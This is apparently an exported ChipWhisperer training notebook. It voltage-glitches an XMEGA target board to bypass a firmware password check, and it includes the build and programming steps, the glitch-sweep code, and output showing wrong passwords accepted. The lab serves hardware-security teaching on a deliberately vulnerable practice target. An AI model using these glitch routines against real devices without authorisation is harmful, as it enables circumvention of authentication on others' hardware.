# Part 2, Topic 2: Voltage Glitching to Bypass Password

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *We've seen how voltage glitching can be used to corrupt calculations, just like clock glitching. Let's continue on and see if it can also be used to break past a password check.*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching

## Firmware

Again, we've already covered this lab, so it'll be mostly up to you!

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
SS_VER = 'SS_VER_1_1'

In [2]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

INFO: Found ChipWhisperer😍


In [3]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../hardware/victims/firmware/simpleserial-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE SS_VER=$2

SS_VER set to SS_VER_1_1
rm -f -- simpleserial-glitch-CWLITEXMEGA.hex
rm -f -- simpleserial-glitch-CWLITEXMEGA.eep
rm -f -- simpleserial-glitch-CWLITEXMEGA.cof
rm -f -- simpleserial-glitch-CWLITEXMEGA.elf
rm -f -- simpleserial-glitch-CWLITEXMEGA.map
rm -f -- simpleserial-glitch-CWLITEXMEGA.sym
rm -f -- simpleserial-glitch-CWLITEXMEGA.lss
rm -f -- objdir-CWLITEXMEGA/*.o
rm -f -- objdir-CWLITEXMEGA/*.lst
rm -f -- simpleserial-glitch.s simpleserial.s XMEGA_AES_driver.s uart.s usart_driver.s xmega_hal.s
rm -f -- simpleserial-glitch.d simpleserial.d XMEGA_AES_driver.d uart.d usart_driver.d xmega_hal.d
rm -f -- simpleserial-glitch.i simpleserial.i XMEGA_AES_driver.i uart.i usart_driver.i xmega_hal.i
.
Welcome to another exciting ChipWhisperer target build!!
avr-gcc (GCC) 5.4.0
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Compiling C: s

In [4]:
fw_path = "../../../hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)

XMEGA Programming flash...
XMEGA Reading flash...
Verified flash OK, 2559 bytes


In [5]:
if PLATFORM == "CWLITEXMEGA":
    scope.clock.clkgen_freq = 32E6
    if SS_VER=='SS_VER_2_0':
        target.baud = 230400*32/7.37
    else:
        target.baud = 38400*32/7.37
    def reboot_flush():            
        scope.io.pdic = False
        time.sleep(0.1)
        scope.io.pdic = "high_z"
        time.sleep(0.1)
        #Flush garbage too
        target.flush()
else:
    scope.clock.clkgen_freq = 24E6
    if SS_VER=='SS_VER_2_0':
        target.baud = 230400*24/7.37
    else:
        target.baud = 38400*24/7.37
    time.sleep(0.1)
    def reboot_flush():            
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = "high_z"
        time.sleep(0.05)
        #Flush garbage too
        target.flush()

In [6]:
#Do glitch loop
reboot_flush()
pw = bytearray([0x74, 0x6F, 0x75, 0x63, 0x68])
target.simpleserial_write('p', pw)

val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
    response = val['payload']
    raw_serial = val['full_response']
    error_code = val['rv']

print(val)

{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 0}


In [7]:
scope.adc.timeout = 0.1
scope.glitch.clk_src = "clkgen" # set glitch input clock
scope.glitch.output = "glitch_only" # glitch_out = glitch
scope.glitch.trigger_src = "ext_single" # glitch only after scope.arm() called
if PLATFORM == "CWLITEXMEGA":
    scope.io.glitch_lp = True
    scope.io.glitch_hp = True
elif PLATFORM == "CWLITEARM":
    scope.io.glitch_lp = True
    scope.io.glitch_hp = True
elif PLATFORM == "CW308_STM32F3":
    scope.io.glitch_hp = True
    scope.io.glitch_lp = True

In [8]:
import matplotlib.pylab as plt
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset"])
gc.display_stats()

IntText(value=0, description='success count:', disabled=True)

IntText(value=0, description='reset count:', disabled=True)

IntText(value=0, description='normal count:', disabled=True)

FloatSlider(value=0.0, continuous_update=False, description='width setting:', disabled=True, max=10.0, readout…

FloatSlider(value=0.0, continuous_update=False, description='offset setting:', disabled=True, max=10.0, readou…

FloatSlider(value=0.0, continuous_update=False, description='ext_offset setting:', disabled=True, max=10.0, re…

In [9]:
import chipwhisperer.common.results.glitch as glitch
g_step = 0.2

# insert settings you found in the last part
gc.set_range("width", 45.7, 47.8)
gc.set_range("offset", 2.8, 10)
gc.set_range("ext_offset", 0, 15)
scope.glitch.repeat = 5

gc.set_global_step(g_step)

scope.adc.timeout = 0.1

reboot_flush()

for glitch_settings in gc.glitch_values():
    scope.glitch.offset = glitch_settings[1]
    scope.glitch.width = glitch_settings[0]
    scope.glitch.ext_offset = glitch_settings[2]
    if scope.adc.state:
        # can detect crash here (fast) before timing out (slow)
        print("Trigger still high!")
        gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
        reboot_flush()

    scope.arm()
    target.simpleserial_write('p', bytearray([0]*5))
    scope.io.glitch_hp = False
    scope.io.glitch_hp = True
    scope.io.glitch_lp = False
    scope.io.glitch_lp = True
    ret = scope.capture()

    val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
    if ret:
        print('Timeout - no trigger')
        gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))

        #Device is slow to boot?
        reboot_flush()

    else:
        if val['valid'] is False:
            gc.add("reset", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
            reboot_flush()
        else:
            if val['payload'] == bytearray([1]): #for loop check
                gc.add("success", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))
                print(val)
                print(val['payload'])
                print(scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
                print("🐙", end="")
            else:
                gc.add("normal", (scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset))

{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 0}
CWbytearray(b'01')
45.703125 2.734375 5
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 0}
CWbytearray(b'01')
45.703125 2.734375 5
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 0}
CWbytearray(b'01')
45.703125 2.734375 5
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 0}
CWbytearray(b'01')
45.703125 2.734375 5
🐙Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 0}
CWbytearray(b'01')
45.703125 3.125 5
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 0}
CWbytearray(b'01')
45.703125 3.125 5
🐙Trigger still high!
Trigger still high!
Trigger still high!
{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 0}
CWbyte

ERROR:ChipWhisperer Target:Ack error: rRES
ERROR:ChipWhisperer Target:Ack error: rRES


Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 0}
CWbytearray(b'01')
45.703125 5.859375 5
🐙Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 0}
CWbytearray(b'01')
45.703125 6.25 5
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': 'r01\n', 'rv': 0}
CWbytearray(b'01')
45.703125 6.25 5
🐙Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!


In [ ]:
%matplotlib ipympl
gc.results.plot_2d(plotdots={'success':'+g', 'reset':'xr', 'normal':None})

In [ ]:
scope.glitch

In [ ]:
scope.dis()
target.dis()